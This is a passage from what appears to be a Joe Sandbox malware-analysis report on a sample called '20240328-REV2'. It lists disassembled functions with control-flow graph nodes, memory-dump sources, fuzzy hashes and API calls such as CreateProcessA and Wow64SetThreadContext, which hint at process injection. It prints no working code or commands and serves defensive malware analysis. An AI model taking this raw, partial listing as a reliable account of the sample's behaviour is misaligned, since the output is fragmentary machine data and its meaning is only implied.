170 895ac65-895ac71 166->170 171 895af8e-895af94 168->171 172 895af39-895af83 168->172 170->165 171->110 172->168 180->181 184 895adba-895adc9 180->184 182 895ae32-895ae53 181->182 183 895ae2d 181->183 187 895ae55 182->187 188 895ae5a-895ae79 182->188 183->182 189 895ae08-895ae0e 184->189 187->188 195 895ae80-895aea0 188->195 196 895ae7b 188->196 191 895ae10-895ae11 189->191 192 895adcb-895adcf 189->192 193 895b3cf-895b3e4 190->193 194 895b55e-895b5b9 190->194 197 895aeab 191->197 198 895add1-895add5 192->198 199 895add9-895adfa 192->199 200 895b3e6 193->200 201 895b3ed-895b543 193->201 218 895b5f0-895b61a 194->218 219 895b5bb-895b5ee 194->219 202 895aea7 195->202 203 895aea2 195->203 196->195 197->121 198->199 206 895ae01-895ae05 199->206 207 895adfc 199->207 200->201 208 895b3f3-895b433 200->208 209 895b4c2-895b502 200->209 210 895b47d-895b4bd 200->210 211 895b438-895b478 200->211 222 895b549 201->222 202->197 203->202 206->189 207->206 208->222 209->222 210->222 211->222 227 895b623-895b6b6 218->227 219->227 222->190 231 895b6bd-895b6d5 227->231 231->115
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &IH3
                                                  • API String ID: 0-1546010026
                                                  • Opcode ID: d16f7d7e1d4b9c9045519bf08de7307ea3f07c9449e197dc9ecf28b621b83895
                                                  • Instruction ID: 6b6d120619938bc8c510175d9a9e3d28685ecc3ac3d1700a19716af27e2be75e
                                                  • Opcode Fuzzy Hash: d16f7d7e1d4b9c9045519bf08de7307ea3f07c9449e197dc9ecf28b621b83895
                                                  • Instruction Fuzzy Hash: 57B2C275E00228CFDB64DF69C984AD9BBB2FF89305F1581E9D509AB225DB319E81CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070BA138 Relevance: 1.9, APIs: 1, Instructions: 377COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 232 70ba138-70ba140 233 70ba142-70ba16a 232->233 234 70ba135-70ba137 232->234 235 70ba519-70ba51e 233->235 236 70ba170-70ba1ab call 70b9c90 call 70b9ca0 call 70b9cb0 233->236 234->232 238 70ba528-70ba53a call 70b7748 235->238 239 70ba520-70ba522 235->239 249 70ba1be-70ba1de 236->249 250 70ba1ad-70ba1b7 236->250 245 70ba540-70ba547 238->245 239->238 252 70ba1f1-70ba211 249->252 253 70ba1e0-70ba1ea 249->253 250->249 255 70ba213-70ba21d 252->255 256 70ba224-70ba244 252->256 253->252 255->256 258 70ba257-70ba260 call 70b9cc0 256->258 259 70ba246-70ba250 256->259 262 70ba262-70ba27d call 70b9cc0 258->262 263 70ba284-70ba28d call 70b9cd0 258->263 259->258 262->263 268 70ba28f-70ba2aa call 70b9cd0 263->268 269 70ba2b1-70ba2ba call 70b9ce0 263->269 268->269 275 70ba2bc-70ba2c0 call 70b9cf0 269->275 276 70ba2c5-70ba2e1 269->276 275->276 280 70ba2f9-70ba2fd 276->280 281 70ba2e3-70ba2e9 276->281 284 70ba2ff-70ba310 call 70b9d00 280->284 285 70ba317-70ba35f 280->285 282 70ba2eb 281->282 283 70ba2ed-70ba2ef 281->283 282->280 283->280 284->285 291 70ba383-70ba38a 285->291 292 70ba361 285->292 293 70ba38c-70ba39b 291->293 294 70ba3a1-70ba3af call 70b9d10 291->294 295 70ba364-70ba36a 292->295 293->294 304 70ba3b9-70ba3e2 call 70b7748 call 70b9d20 294->304 305 70ba3b1-70ba3b3 294->305 297 70ba548-70ba57e 295->297 298 70ba370-70ba376 295->298 306 70ba580 297->306 307 70ba585-70ba5aa KiUserExceptionDispatcher 297->307 301 70ba378-70ba37a 298->301 302 70ba380-70ba381 298->302 301->302 302->291 302->295 314 70ba40f-70ba42b 304->314 315 70ba3e4-70ba3f2 304->315 305->304 306->307 309 70ba5ac-70ba5b5 307->309 318 70ba43e-70ba465 call 70b9d30 314->318 319 70ba42d-70ba437 314->319 315->314 320 70ba3f4-70ba408 315->320 325 70ba47d-70ba481 318->325 326 70ba467-70ba46d 318->326 319->318 320->314 327 70ba49c-70ba4b8 325->327 328 70ba483-70ba495 325->328 329 70ba46f 326->329 330 70ba471-70ba473 326->330 333 70ba4ba-70ba4c0 327->333 334 70ba4d0-70ba4d4 327->334 328->327 329->325 330->325 335 70ba4c2 333->335 336 70ba4c4-70ba4c6 333->336 334->245 337 70ba4d6-70ba4e4 334->337 335->334 336->334 339 70ba4f6-70ba4fa 337->339 340 70ba4e6-70ba4f4 337->340 342 70ba500-70ba518 339->342 340->339 340->342
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 070BA58F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: b7c469665d98b79f6b52cedd3cfe7be0e307ca79de7717ac05dd6ed98d2f2622
                                                  • Instruction ID: 1873dfaf7c618cc4ea5ec0fa962488d0fac7c4b59f42d5058d51178d07e7792b
                                                  • Opcode Fuzzy Hash: b7c469665d98b79f6b52cedd3cfe7be0e307ca79de7717ac05dd6ed98d2f2622
                                                  • Instruction Fuzzy Hash: 21D19AF1B007058FDBA5EB75C450BAEB7F6AF89700F10856DD24A9B290DB35EA01CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA9BC0 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tIh
                                                  • API String ID: 0-443931868
                                                  • Opcode ID: c75b4ed9251025c279c6177c6db3b5fd4864dcfc2bf9ed80377e19b17210893a
                                                  • Instruction ID: 005339484071efa8a06cd73a5a10e59472cf680b6db983a5cddcdfe51ec51813
                                                  • Opcode Fuzzy Hash: c75b4ed9251025c279c6177c6db3b5fd4864dcfc2bf9ed80377e19b17210893a
                                                  • Instruction Fuzzy Hash: 0AD11270E2471ADFDB44CFA9C5818AEFBB6FB88300F10A559D416AB215D734AA42CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA7A20 Relevance: 1.5, Strings: 1, Instructions: 201COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )"
                                                  • API String ID: 0-4237191880
                                                  • Opcode ID: 93d7232bbbebb3c9aae57c32a008238c869988bd3dbe0b4423ffcb711e35db88
                                                  • Instruction ID: b3c187627ee03f0706cfa633fcbb435965b1d792e555af774667b61f8ebbf3f7
                                                  • Opcode Fuzzy Hash: 93d7232bbbebb3c9aae57c32a008238c869988bd3dbe0b4423ffcb711e35db88
                                                  • Instruction Fuzzy Hash: 5881C174E002099FDB48CFEAC984AEEBBB2FF88310F24942AD415AB254D774A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 089539C0 Relevance: 1.0, Instructions: 969COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7eca868270da5558a3811e79a242512c50c8445afbed7909ad68a04fb76e1708
                                                  • Instruction ID: 604172825300afc21d93914cd60c05a51cb99d24d27edff4a9c5542682d7a12c
                                                  • Opcode Fuzzy Hash: 7eca868270da5558a3811e79a242512c50c8445afbed7909ad68a04fb76e1708
                                                  • Instruction Fuzzy Hash: 5872D030B002158FDB58EB78C858B6E77A6AFC9751F248569D80ADB3A0CF34DD06D7A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08956CD8 Relevance: .8, Instructions: 805COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca7b84f1ae91ecf3e37b83013d38515b7a9038bfc8b05f0f33137d8742f8b906
                                                  • Instruction ID: 815f4b524fb318d432e6dc6f5a4566d44ba35008e96a06013631bb994ff3f2ca
                                                  • Opcode Fuzzy Hash: ca7b84f1ae91ecf3e37b83013d38515b7a9038bfc8b05f0f33137d8742f8b906
                                                  • Instruction Fuzzy Hash: C9721E34A00219CFDB15EF68C844AADF7F1BF89311F1586A9D859AB351DB30AD85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0534C550 Relevance: .7, Instructions: 668COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584604125.0000000005340000.00000040.00000800.00020000.00000000.sdmp, Offset: 05340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5340000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2bb63d3d3a28e381bce96f18bc073c4ecf13f3a2122a19be4052e699df74c75f
                                                  • Instruction ID: a52efd88fe99b783defccaf987dbe08c4ddb359674d09b161e30562b71659cc5
                                                  • Opcode Fuzzy Hash: 2bb63d3d3a28e381bce96f18bc073c4ecf13f3a2122a19be4052e699df74c75f
                                                  • Instruction Fuzzy Hash: 87521134A012088FDB14DF68C588A6DB7F2BF89715F2595A8E80A9B361CB74FD46CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04D31808 Relevance: .6, Instructions: 588COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584098888.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4d30000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ec4e8c50f76ae46a880fe6b82ea895f72df581c917571cc8263c8ddc096a296
                                                  • Instruction ID: 8ef60efe8e80fdbe209285f20f7a904bdcc48a3ac4ff9511547b6070d361649e
                                                  • Opcode Fuzzy Hash: 1ec4e8c50f76ae46a880fe6b82ea895f72df581c917571cc8263c8ddc096a296
                                                  • Instruction Fuzzy Hash: B9525E34A003568FDB14DF28C844B99B7B2FFC9314F2582A9D5596F3A2DB71A982CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04D317F8 Relevance: .6, Instructions: 577COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1584098888.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_4d30000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff4f0b164f684ad7cf6a1cbdcbf8746fba73cf06e7e33f99cbf8bb36917107e5
                                                  • Instruction ID: 61a89bc34078b6c7467165614672b3484194bf1ac77714430f8bd6c38c886581
                                                  • Opcode Fuzzy Hash: ff4f0b164f684ad7cf6a1cbdcbf8746fba73cf06e7e33f99cbf8bb36917107e5
                                                  • Instruction Fuzzy Hash: 9E526E34A003568FDB14DF28C844B99B7B2FFC5314F2582A9D5596F3A2DB71A982CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EACC18 Relevance: .2, Instructions: 231COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb73bd0c44af3a4585f2ee4d2ff3f9683d43b90d41be90bae6083f87a1fbc1d5
                                                  • Instruction ID: 0c49bf917cffb78fdb5cff1abf623736c4e7b5c9ce2a53bc372fecf618e75884
                                                  • Opcode Fuzzy Hash: fb73bd0c44af3a4585f2ee4d2ff3f9683d43b90d41be90bae6083f87a1fbc1d5
                                                  • Instruction Fuzzy Hash: 40910370E16308DFDB48CFA9D5809DDBBB2FB89700F20A42AE416BB264D734A945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAC900 Relevance: .2, Instructions: 204COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cce6b1f289e4b55a2495ba95f9ed6d6a0d17b96dc2540a21be0748370646fc57
                                                  • Instruction ID: 7b86f82aef1d5edaf18d3c84859a49fbb15fc9698cbb1cc6451090a538ec3dea
                                                  • Opcode Fuzzy Hash: cce6b1f289e4b55a2495ba95f9ed6d6a0d17b96dc2540a21be0748370646fc57
                                                  • Instruction Fuzzy Hash: 72810674E05219DFDB44CFA9C9809EEFBB1FB88300F20A55AD415BB254D734A916CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EA8D10 Relevance: .1, Instructions: 66COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 04e26a5055a105f3fdb7f89a6a0710f70f215493fc46eb4b0cbfbc65d0b20969
                                                  • Instruction ID: 066ffcb26d0266b00a35b909a0b29e5afda7f32e6882cdc607c4acd843a46893
                                                  • Opcode Fuzzy Hash: 04e26a5055a105f3fdb7f89a6a0710f70f215493fc46eb4b0cbfbc65d0b20969
                                                  • Instruction Fuzzy Hash: 2A21E9B1E006188BEB58CFABD8402DEFBF7AFC8310F14C06AD509AA258DB701A45CE50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959CB8 Relevance: .1, Instructions: 59COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1d42e9b92f9e63dc1e54eb34416e21855ee526883348148d44d9f2c361a9fa74
                                                  • Instruction ID: 860f4d6e1fcb191d3826538940804310e9a1bafcfe42a6481b0f8f46e4f55f52
                                                  • Opcode Fuzzy Hash: 1d42e9b92f9e63dc1e54eb34416e21855ee526883348148d44d9f2c361a9fa74
                                                  • Instruction Fuzzy Hash: 38215EB1E052548BE718DFABD90439EBBF7AFC9301F04C07AD809AB258EB3008068F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 08959CC8 Relevance: .1, Instructions: 55COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1587080933.0000000008950000.00000040.00000800.00020000.00000000.sdmp, Offset: 08950000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_8950000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1583882e0f406454b49484da0e45ecfa031e5abfbbf1f766321cf4b1fcda403b
                                                  • Instruction ID: 7f3899d09a3efb7144a293fed9894d70104880009adff1d0bb0f1d8e7dcdf102
                                                  • Opcode Fuzzy Hash: 1583882e0f406454b49484da0e45ecfa031e5abfbbf1f766321cf4b1fcda403b
                                                  • Instruction Fuzzy Hash: 8611EF71E056588BE71CDFABD90439EBBF7AFC9300F04C17AD8196A258DB7409458F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FDF58 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 025FDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 025FE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 025FE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 025FE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 3a62a5ede29a9bb65ffa62d744cd9a5e5c993742e894de5b2595fc3ea0afc80c
                                                  • Instruction ID: 38dc9e80abaac863fc0d64d08351d7dc09d5681329cd8925febc9b7fee3850c4
                                                  • Opcode Fuzzy Hash: 3a62a5ede29a9bb65ffa62d744cd9a5e5c993742e894de5b2595fc3ea0afc80c
                                                  • Instruction Fuzzy Hash: 105174B090134ACFDB14DFAAD648BAEBBF1BF88314F208459E508A73A0CB355944CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FDF60 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 025FDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 025FE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 025FE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 025FE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: af6f273884a1641e56ac33ae65b4dc228d06e1f828e6e3007fed274731e2ffbc
                                                  • Instruction ID: f3ed9c1cc4cbfd831bddedee7fa3e714edc6ea907355cbf4dce90d28ac8d43b7
                                                  • Opcode Fuzzy Hash: af6f273884a1641e56ac33ae65b4dc228d06e1f828e6e3007fed274731e2ffbc
                                                  • Instruction Fuzzy Hash: 155164B090134ACFDB14DFAAC548BAEBBF1BF88314F208559E508A73A0CB346944CF65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 06EAA200 Relevance: 2.6, Strings: 2, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 46 6eaa200-6eaa21e 47 6eaa220 46->47 48 6eaa225-6eaa22d call 6eaa2f8 46->48 47->48 49 6eaa233 48->49 50 6eaa23a-6eaa256 49->50 51 6eaa258 50->51 52 6eaa25f-6eaa260 50->52 51->49 51->52 53 6eaa2cd-6eaa2d1 51->53 54 6eaa262-6eaa276 51->54 55 6eaa2a6-6eaa2c8 51->55 52->53 57 6eaa278-6eaa287 54->57 58 6eaa289-6eaa290 54->58 55->50 59 6eaa297-6eaa2a4 57->59 58->59 59->50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1585780879.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_6ea0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3H5$3H5
                                                  • API String ID: 0-2752242361
                                                  • Opcode ID: 6f40a506ade08c6db476d465013589233f079393d8e4b82e1b597b04e628a5a2
                                                  • Instruction ID: e073ddbda686853e206c62b6442aa76c6c84b203f0a4cefa7f6fd6e25b591a10
                                                  • Opcode Fuzzy Hash: 6f40a506ade08c6db476d465013589233f079393d8e4b82e1b597b04e628a5a2
                                                  • Instruction Fuzzy Hash: 4F2139B0D00309DFDB44CFAAC540AAEFBF1FF89300F10D56A9508AB214E731AA55CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B5E40 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 344 70b5e40-70b5ed5 346 70b5f0e-70b5f2e 344->346 347 70b5ed7-70b5ee1 344->347 354 70b5f30-70b5f3a 346->354 355 70b5f67-70b5f96 346->355 347->346 348 70b5ee3-70b5ee5 347->348 349 70b5f08-70b5f0b 348->349 350 70b5ee7-70b5ef1 348->350 349->346 352 70b5ef3 350->352 353 70b5ef5-70b5f04 350->353 352->353 353->353 356 70b5f06 353->356 354->355 357 70b5f3c-70b5f3e 354->357 363 70b5f98-70b5fa2 355->363 364 70b5fcf-70b6089 CreateProcessA 355->364 356->349 358 70b5f61-70b5f64 357->358 359 70b5f40-70b5f4a 357->359 358->355 361 70b5f4e-70b5f5d 359->361 362 70b5f4c 359->362 361->361 365 70b5f5f 361->365 362->361 363->364 366 70b5fa4-70b5fa6 363->366 375 70b608b-70b6091 364->375 376 70b6092-70b6118 364->376 365->358 368 70b5fc9-70b5fcc 366->368 369 70b5fa8-70b5fb2 366->369 368->364 370 70b5fb6-70b5fc5 369->370 371 70b5fb4 369->371 370->370 373 70b5fc7 370->373 371->370 373->368 375->376 386 70b611a-70b611e 376->386 387 70b6128-70b612c 376->387 386->387 388 70b6120 386->388 389 70b612e-70b6132 387->389 390 70b613c-70b6140 387->390 388->387 389->390 393 70b6134 389->393 391 70b6142-70b6146 390->391 392 70b6150-70b6154 390->392 391->392 394 70b6148 391->394 395 70b6166-70b616d 392->395 396 70b6156-70b615c 392->396 393->390 394->392 397 70b616f-70b617e 395->397 398 70b6184 395->398 396->395 397->398 400 70b6185 398->400 400->400
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 070B6076
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1586059222.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_70b0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 8c8b048df1c42ee90d3413e529c57f5a20d4b920d436048fa58de53c49228948
                                                  • Instruction ID: 78a9a1fb0c0458dd34f77df1ff7aeb9ff2d4ab9e75c9fdbfdd8f85aaba7b3cc4
                                                  • Opcode Fuzzy Hash: 8c8b048df1c42ee90d3413e529c57f5a20d4b920d436048fa58de53c49228948
                                                  • Instruction Fuzzy Hash: E2914AB1D0031ADFDB20CF69CC417DEBBF2AB48310F0486A9D809A7290DB759A95CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 025FBCB8 Relevance: 1.7, APIs: 1, Instructions: 206COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 401 25fbcb8-25fbcba 402 25fbcbe-25fbcc2 401->402 403 25fbcbc 401->403 404 25fbcc6 402->404 405 25fbcc4-25fbcc5 402->405 403->402 406 25fbcca-25fbcd7 404->406 407 25fbcc8-25fbcc9 404->407 405->404 408 25fbcd9-25fbce6 call 25f921c 406->408 409 25fbd03-25fbd07 406->409 407->406 416 25fbcfc 408->416 417 25fbce8 408->417 410 25fbd1b-25fbd5c 409->410 411 25fbd09-25fbd13 409->411 418 25fbd5e-25fbd66 410->418 419 25fbd69-25fbd77 410->419 411->410 416->409 464 25fbcee call 25fbf50 417->464 465 25fbcee call 25fbf60 417->465 418->419 421 25fbd9b-25fbd9d 419->421 422 25fbd79-25fbd7e 419->422 420 25fbcf4-25fbcf6 420->416 423 25fbe38-25fbef8 420->423 424 25fbda0-25fbda7 421->424 425 25fbd89 422->425 426 25fbd80-25fbd87 call 25fb66c 422->426 457 25fbefa-25fbefd 423->457 458 25fbf00-25fbf2b GetModuleHandleW 423->458 428 25fbda9-25fbdb1 424->428 429 25fbdb4-25fbdbb 424->429 427 25fbd8b-25fbd99 425->427 426->427 427->424 428->429 431 25fbdbd-25fbdc5 429->431 432 25fbdc8-25fbdd1 call 25fb67c 429->432 431->432 438 25fbdde-25fbde3 432->438 439 25fbdd3-25fbddb 432->439 440 25fbde5-25fbdec 438->440 441 25fbe01-25fbe05 438->441 439->438 440->441 443 25fbdee-25fbdfe call 25fb68c call 25fb69c 440->443 462 25fbe08 call 25fc260 441->462 463 25fbe08 call 25fc230 441->463 443->441 444 25fbe0b-25fbe0e 447 25fbe31-25fbe37 444->447 448 25fbe10-25fbe2e 444->448 448->447 457->458 459 25fbf2d-25fbf33 458->459 460 25fbf34-25fbf48 458->460 459->460 462->444 463->444 464->420 465->420
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 025FBF1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.1581028936.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_25f0000_20240328-REV2.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 81b9de475cf9f1246dd62bf0d12380c81109ada84af5cfa8192679bea9b4b27b
                                                  • Instruction ID: 2706f4b5aea72f340e11bde89701e7514166ac9680de3a49017dae3bcc880e79
                                                  • Opcode Fuzzy Hash: 81b9de475cf9f1246dd62bf0d12380c81109ada84af5cfa8192679bea9b4b27b
                                                  • Instruction Fuzzy Hash: 718123B0A00B05CFDB64DF29D44475ABBF1BF88308F008A2ED586DBA50DB75E946CB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 070B56AF Relevance: 1.7, APIs: 1, Instructions: 159threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 466 70b56af-70b56b8 467 70b56ba-70b56ef 466->467 468 70b5664-70b5673 Wow64SetThreadContext 466->468 469 70b56f1 467->469 470 70b56f6-70b574f 467->470 471 70b567c-70b56ac 468->471 472 70b5675-70b567b 468->472 469->470 473 70b5862-70b5873 470->473 474 70b5755-70b5757 470->474 472->471 476 70b58eb-70b58fc 473->476 477 70b5875-70b5877 473->477 474->473 475 70b575d-70b578d 474->475 480 70b578f 475->480 481 70b5794-70b57a5 475->481 482 70b5adb-70b5ae5 476->482 483 70b5902-70b5904 476->483 477->476 484 70b5879-70b5889 477->484 480->481 486 70b57ac-70b57c2 481->486 487 70b57a7 481->487 483->482 485 70b590a-70b593a 483->485 488 70b588b-70b5898 484->488 489 70b589a 484->489 491 70b593c 485->491 492 70b5941-70b5952 485->492 493 70b57c9-70b57df 486->493 494 70b57c4 486->494 487->486 495 70b589d-70b58d8 488->495 489->495 491->492 496 70b5959-70b596f 492->496 497 70b5954 492->497 499 70b57e1 493->499 500 70b57e6-70b5841 493->500 494->493 510 70b58da 495->510 511 70b58df-70b58e6 495->511 501 70b5971 496->501 502 70b5976-70b598c 496->502 497->496 499->500 522 70b584b 500->522 523 70b5843-70b5849 500->523 501->502 504 70b598e 502->504 505 70b5993-70b59d0 502->505 504->505 508 70b59d2 505->508 509 70b59d7-70b59e8 505->509 508->509 513 70b59ea 509->513 514 70b59ef-70b5a05 509->514 510->511 511->482 